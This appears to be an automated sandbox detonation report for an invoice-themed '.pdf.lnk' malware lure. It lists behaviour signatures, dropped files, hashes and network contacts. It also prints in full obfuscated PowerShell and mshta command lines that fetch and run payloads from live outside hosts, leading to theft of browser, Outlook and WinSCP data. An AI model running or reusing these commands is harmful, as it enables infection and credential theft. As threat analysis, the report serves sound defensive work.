| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Windows\system32\mshta.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Windows\system32\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Rechnung_2024_0091.pdf.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $a='48aAs.69edS3b/:15u2vtmrpL0-7h'; &(-join($a[(-648+652),(169-167),(990-966)])) ^[ (-join($a[(-648+652),(169-167),(990-966)])); ^[ /# (-join($a[(-476+497),(-648+652),(-158+186),(-824+844),(169-167)])); foreach($z in @((-105+133),(-426+446),(575-555),(173-150),(-217+221),(-509+523),(524-511),(711-698),(210-187),(-471+488),(-724+736),(-668+694),(-606+622),(-351+363),(906-899),(-719+737),(899-881),(166-155),(387-375),(-188+203),(-604+616),(783-776),(-378+386),(775-748),(660-660),(995-993),(803-776),(-863+888),(-920+932),(333-325),(994-976),(559-541),(700-698),(835-810),(-958+959),(425-410),(-411+417),(686-684),(-963+964),(569-557),(934-907),(861-853),(-724+726),(950-941),(494-489),(-470+492),(-789+807),(805-800),(-232+241),(-603+611),(1008-989),(-242+255),(-653+668),(-705+723),(580-569),(-536+541),(986-958),(736-716),(-368+370))){$m+=$a[$z]}; /# $m;
C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev/123.hta
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function hQzEzFacg($guorUJ, $OIoEigYq){[IO.File]::WriteAllBytes($guorUJ, $OIoEigYq)};function uuuOHRemK($guorUJ){if($guorUJ.EndsWith((ijnaJnaV @(5036,5090,5098,5098))) -eq $True){Start-Process (ijnaJnaV @(5104,5107,5100,5090,5098,5098,5041,5040,5036,5091,5110,5091)) $guorUJ}else{Start-Process $guorUJ}};function xlptFHdqR($FSYzd){$EBqZdo = New-Object (ijnaJnaV @(5068,5091,5106,5036,5077,5091,5088,5057,5098,5095,5091,5100,5106));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OIoEigYq = $EBqZdo.DownloadData($FSYzd);return $OIoEigYq};function ijnaJnaV($UxikGUX){$MKUYRJP=4990;$VRwScE=$Null;foreach($NymBWJi in $UxikGUX){$VRwScE+=[char]($NymBWJi-$MKUYRJP)};return $VRwScE};function TQiKbyGz(){$vXhNEzkB = $env:APPDATA + '\';$WRrNymqB = xlptFHdqR (ijnaJnaV @(5094,5106,5106,5102,5105,5048,5037,5037,5102,5107,5088,5035,5043,5088,5047,5040,5040,5041,5088,5039,5088,5047,5091,5045,5042,5087,5045,5038,5088,5091,5040,5040,5087,5038,5046,5039,5044,5087,5046,5088,5045,5091,5087,5090,5036,5104,5040,5036,5090,5091,5108,5037,5059,5078,5056,5072,5072,5076,5071,5074,5036,5091,5110,5091));$AvKehPB = $vXhNEzkB + 'EXBRRVQT.exe';hQzEzFacg $AvKehPB $WRrNymqB;uuuOHRemK $AvKehPB;;;;}TQiKbyGz;
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | udp |
| US | 172.66.0.235:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 172.66.0.235:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 23.192.22.93:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.252.143:80 | crl.microsoft.com | tcp |
Files
memory/2856-38-0x000007FEF610E000-0x000007FEF610F000-memory.dmp
memory/2856-40-0x0000000001F60000-0x0000000001F68000-memory.dmp
memory/2856-39-0x000000001B680000-0x000000001B962000-memory.dmp
memory/2856-42-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp
memory/2856-41-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp
memory/2856-43-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp
memory/2856-44-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp
memory/2856-45-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp
memory/2856-46-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp
memory/1996-64-0x000000001B7C0000-0x000000001BAA2000-memory.dmp
memory/1996-65-0x0000000001D60000-0x0000000001D68000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-14 20:00
Reported
2024-11-14 20:02
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{B1C17772-51E1-4EA9-9894-03A754292AA2}\.cr\EXBRRVQT.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\ActiveISO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
Loads dropped DLL
Reads WinSCP keys stored on the system
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3884 set thread context of 1368 | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | C:\Windows\SysWOW64\cmd.exe |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Temp\{B1C17772-51E1-4EA9-9894-03A754292AA2}\.cr\EXBRRVQT.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\ActiveISO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Rechnung_2024_0092.pdf.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $a='48aAs.69edS3b/:15u2vtmrpL0-7h'; &(-join($a[(-648+652),(169-167),(990-966)])) ^[ (-join($a[(-648+652),(169-167),(990-966)])); ^[ /# (-join($a[(-476+497),(-648+652),(-158+186),(-824+844),(169-167)])); foreach($z in @((-105+133),(-426+446),(575-555),(173-150),(-217+221),(-509+523),(524-511),(711-698),(210-187),(-471+488),(-724+736),(-668+694),(-606+622),(-351+363),(906-899),(-719+737),(899-881),(166-155),(387-375),(-188+203),(-604+616),(783-776),(-378+386),(775-748),(660-660),(995-993),(803-776),(-863+888),(-920+932),(333-325),(994-976),(559-541),(700-698),(835-810),(-958+959),(425-410),(-411+417),(686-684),(-963+964),(569-557),(934-907),(861-853),(-724+726),(950-941),(494-489),(-470+492),(-789+807),(805-800),(-232+241),(-603+611),(1008-989),(-242+255),(-653+668),(-705+723),(580-569),(-536+541),(986-958),(736-716),(-368+370))){$m+=$a[$z]}; /# $m;
C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev/123.hta
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function hQzEzFacg($guorUJ, $OIoEigYq){[IO.File]::WriteAllBytes($guorUJ, $OIoEigYq)};function uuuOHRemK($guorUJ){if($guorUJ.EndsWith((ijnaJnaV @(5036,5090,5098,5098))) -eq $True){Start-Process (ijnaJnaV @(5104,5107,5100,5090,5098,5098,5041,5040,5036,5091,5110,5091)) $guorUJ}else{Start-Process $guorUJ}};function xlptFHdqR($FSYzd){$EBqZdo = New-Object (ijnaJnaV @(5068,5091,5106,5036,5077,5091,5088,5057,5098,5095,5091,5100,5106));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OIoEigYq = $EBqZdo.DownloadData($FSYzd);return $OIoEigYq};function ijnaJnaV($UxikGUX){$MKUYRJP=4990;$VRwScE=$Null;foreach($NymBWJi in $UxikGUX){$VRwScE+=[char]($NymBWJi-$MKUYRJP)};return $VRwScE};function TQiKbyGz(){$vXhNEzkB = $env:APPDATA + '\';$WRrNymqB = xlptFHdqR (ijnaJnaV @(5094,5106,5106,5102,5105,5048,5037,5037,5102,5107,5088,5035,5043,5088,5047,5040,5040,5041,5088,5039,5088,5047,5091,5045,5042,5087,5045,5038,5088,5091,5040,5040,5087,5038,5046,5039,5044,5087,5046,5088,5045,5091,5087,5090,5036,5104,5040,5036,5090,5091,5108,5037,5059,5078,5056,5072,5072,5076,5071,5074,5036,5091,5110,5091));$AvKehPB = $vXhNEzkB + 'EXBRRVQT.exe';hQzEzFacg $AvKehPB $WRrNymqB;uuuOHRemK $AvKehPB;;;;}TQiKbyGz;
C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe
"C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe"
C:\Windows\Temp\{B1C17772-51E1-4EA9-9894-03A754292AA2}\.cr\EXBRRVQT.exe
"C:\Windows\Temp\{B1C17772-51E1-4EA9-9894-03A754292AA2}\.cr\EXBRRVQT.exe" -burn.clean.room="C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe" -burn.filehandle.attached=548 -burn.filehandle.self=520
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\ActiveISO.exe
"C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\ActiveISO.exe"
C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | udp |
| US | 162.159.140.237:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 8.8.8.8:53 | 237.140.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.226.80.104.in-addr.arpa | udp |
| US | 162.159.140.237:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sirnisirlo.online | udp |
| US | 172.67.214.86:443 | sirnisirlo.online | tcp |
| US | 8.8.8.8:53 | 86.214.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp |
Files
memory/2416-2-0x00007FFD6D403000-0x00007FFD6D405000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pvk0ynoi.2ml.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2416-12-0x000001A3F02E0000-0x000001A3F0302000-memory.dmp
memory/2416-13-0x00007FFD6D400000-0x00007FFD6DEC1000-memory.dmp
memory/2416-14-0x00007FFD6D400000-0x00007FFD6DEC1000-memory.dmp
memory/2416-17-0x00007FFD6D400000-0x00007FFD6DEC1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 53e7d5ef4d119de244668b9b57da9c51 |
| SHA1 | 6767a782cdec693099aa3edb361b1e34769a3a1e |
| SHA256 | 52fd66cdeb2c1eb206a7cb2f8ab91b9594caa367443d6d457aa665446bb5c760 |
| SHA512 | adc4d65f851338d90908496df691a2f1c77794bf6ac1a04adbf66c9ad481c7671d8f82d04f8d5b0f37b527e547d9e2e786f4738697787d8a3bd49766f3c0fbaf |
C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe
| MD5 | b6ab13b3b9903bf84327737ba227bab3 |
| SHA1 | 65dff8665b502ba33f3effb8430263e4f906c1c0 |
| SHA256 | baa56e574d8deed445d0e58487add9d429d60bbb1b39943c581bcf50e9bd91d6 |
| SHA512 | 6f6ec1217e14f96a52cfa314327a09bfe74199fa0a85d94f0bd5381a0af7c96ac26ba8b5506663f76473c0714609c80d58cb86bde73888cfd6ea15060793f5c7 |
C:\Windows\Temp\{B1C17772-51E1-4EA9-9894-03A754292AA2}\.cr\EXBRRVQT.exe
| MD5 | eb26dfa5e4e3170d90b5629df0715aa9 |
| SHA1 | bbc10367aa29aa36a6e53c63b60a6936bc6f1720 |
| SHA256 | 70721a20760818839c7ef0ce2d684666bd07bbb79b87415944c6efbce58f7906 |
| SHA512 | 11e2683c8f47c62548050f863386e62908c5dd7e456ca13c22644ecb984533d3abdd72d1fd5a3ac53c1b2734e5999554d383f3f5c615d4c94c4c169664787bf9 |
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\Helicoid.dll
| MD5 | a9c5977784daf8cebe8408a8b6db3fbe |
| SHA1 | 8ae8d67007cdca9acf96681ffa6200e5847972de |
| SHA256 | 63f5a34563b62de3dffa57401d7225f4687933cef250b78b995eee813c862fad |
| SHA512 | 886fbea2c959ce4245185d1dcec3efcfbb50a71840c964d4fd8e0a46f7fbf8afbf7445bc2d892789f25124b862912fb0c3556c5004a7e6ddb4ee13b87cf58a65 |
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\ActiveISO.exe
| MD5 | b84dfabe933d1160f624693d94779ce5 |
| SHA1 | ac0133c09708fe4a3c626e3ba4cdf44d3a0e065f |
| SHA256 | 588cb61b36a001384a2833bd5df8d7982ca79d6ae17a3d83a94e01b1e79684bd |
| SHA512 | eeaeef8d6b5fa02dedf9818babaa4b5ffdb87300521883aa290289dcc720b3d543279085ed3fc649b74654143e678502e56eb3f92c4baf53c075977de33c1b0e |
memory/2440-89-0x00007FFD6C870000-0x00007FFD6CDBE000-memory.dmp
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\vcruntime140_1.dll
| MD5 | 75e78e4bf561031d39f86143753400ff |
| SHA1 | 324c2a99e39f8992459495182677e91656a05206 |
| SHA256 | 1758085a61527b427c4380f0c976d29a8bee889f2ac480c356a3f166433bf70e |
| SHA512 | ce4daf46bce44a89d21308c63e2de8b757a23be2630360209c4a25eb13f1f66a04fbb0a124761a33bbf34496f2f2a02b8df159b4b62f1b6241e1dbfb0e5d9756 |
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\vcruntime140.dll
| MD5 | f12681a472b9dd04a812e16096514974 |
| SHA1 | 6fd102eb3e0b0e6eef08118d71f28702d1a9067c |
| SHA256 | d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8 |
| SHA512 | 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2 |
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\msvcp140.dll
| MD5 | 7db24201efea565d930b7ec3306f4308 |
| SHA1 | 880c8034b1655597d0eebe056719a6f79b60e03c |
| SHA256 | 72fe4598f0b75d31ce2dc621e8ef161338c6450bb017cd06895745690603729e |
| SHA512 | bac5729a3eb53e9bc7b680671d028cabef5ea102dfaa48a7c453b67f8ecb358db9f8fb16b3b1d9ea5a2dff34f459f6ac87f3a563c736d81d31048766198ff11e |
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\Qt5Core.dll
| MD5 | 8c735052a2d4e9b01b0e028f0c20f67c |
| SHA1 | b72bde11de3310a495dd16520362f4adbf21717a |
| SHA256 | d751ab0357f71586b1793ce4166295aba085334647d6e3ffcd49287a801273e7 |
| SHA512 | 0bbd920e1b48361c7f3e1540ddb12fa6c9146bfe36e13eba2b2e6ca8bf3ad961d88121c6f70eca6d9ea413900455e696f7233c5bb54415ca7d2c9c1c0d4c1fb3 |
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\Qt5Network.dll
| MD5 | fe5ed4c5da03077f98c3efa91ecefd81 |
| SHA1 | e23e839ec0602662788f761ebe7dd4b39c018a7f |
| SHA256 | d992aaeb21cb567113126c2912cf75e892c8e3ead5d50147a11abe704b9e2e2b |
| SHA512 | 22514732a0edf8fc2b8770139599132429080b86d2844143d21bb834cbddaaa077d763969960e39e2050a69493c1aae191600e5df6107bde90fae589a054f071 |
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\Qt5Gui.dll
| MD5 | 34893cb3d9a2250f0edecd68aedb72c7 |
| SHA1 | 37161412df2c1313a54749fe6f33e4dbf41d128a |
| SHA256 | ca8334b2e63bc01f0749afeb9e87943c29882131efe58608ea25732961b2df34 |
| SHA512 | 484e32832d69ec1799bd1bcc694418801c443c732ed59ecd76b3f67abf0b1c97d64ae123728dfa99013df846ba45be310502ef6f8da42155da2e89f2a1e8cb2c |
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\Qt5Widgets.dll
| MD5 | c502bb8a4a7dc3724ab09292cd3c70d6 |
| SHA1 | ff44fddeec2d335ec0eaa861714b561f899675fd |
| SHA256 | 4266918226c680789d49cf2407a7fec012b0ed872adafb84c7719e645f9b2e6d |
| SHA512 | 73bef89503ce032fba278876b7dab9eac275632df7a72c77093d433c932272da997e8fbeb431a09d84baac7b2ab2e55222ff687893311949a5603e738bfa6617 |
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\Qt5PrintSupport.dll
| MD5 | d0634933db2745397a603d5976bee8e7 |
| SHA1 | ddec98433bcfec1d9e38557d803bc73e1ff883b6 |
| SHA256 | 7d91d3d341dbba568e2d19382e9d58a42a0d78064c3ad7adfe3c7bb14742c2b1 |
| SHA512 | 9271370cd22115f68bd62572640525e086a05d75f5bc768f06e20b90b48a182f29a658a07099c7bc1e99bf0ffcf1229709524e2af6745d6fed7b41c1addd09f1 |
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\StarBurn.dll
| MD5 | 41e19ba2364f2c834b2487e1d02bb99a |
| SHA1 | 6c61d603dddfe384a93ad33775b70681d0a396d9 |
| SHA256 | c040a25377028b0c28db81a012de786c803a0e9d6f87ce460335a621d31f5340 |
| SHA512 | 6ebf4a9e80f16c6a03ff357d2da9a34a4227bfd65eb66d1d335349a77ba066d069ba0d47d46229b3c77b59052c42d388678662f970b418d8cc3cfb1223427d8c |
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\vechpt
| MD5 | dd899ca13e5bef55bcea07e167da891b |
| SHA1 | e883f0240f127520486f063b033fb34fa2dfe5c1 |
| SHA256 | a818d6fa8caddaa608345ea40b75073a7c98637161794918566e2ddeeede47e7 |
| SHA512 | e38437899fcc433ef89a04c6a68684ea5110181af48a4699836939cf167d0c1fe7932432518445e90acbcbc151ee324d77de064147d97fdedf6ecabaac788c06 |
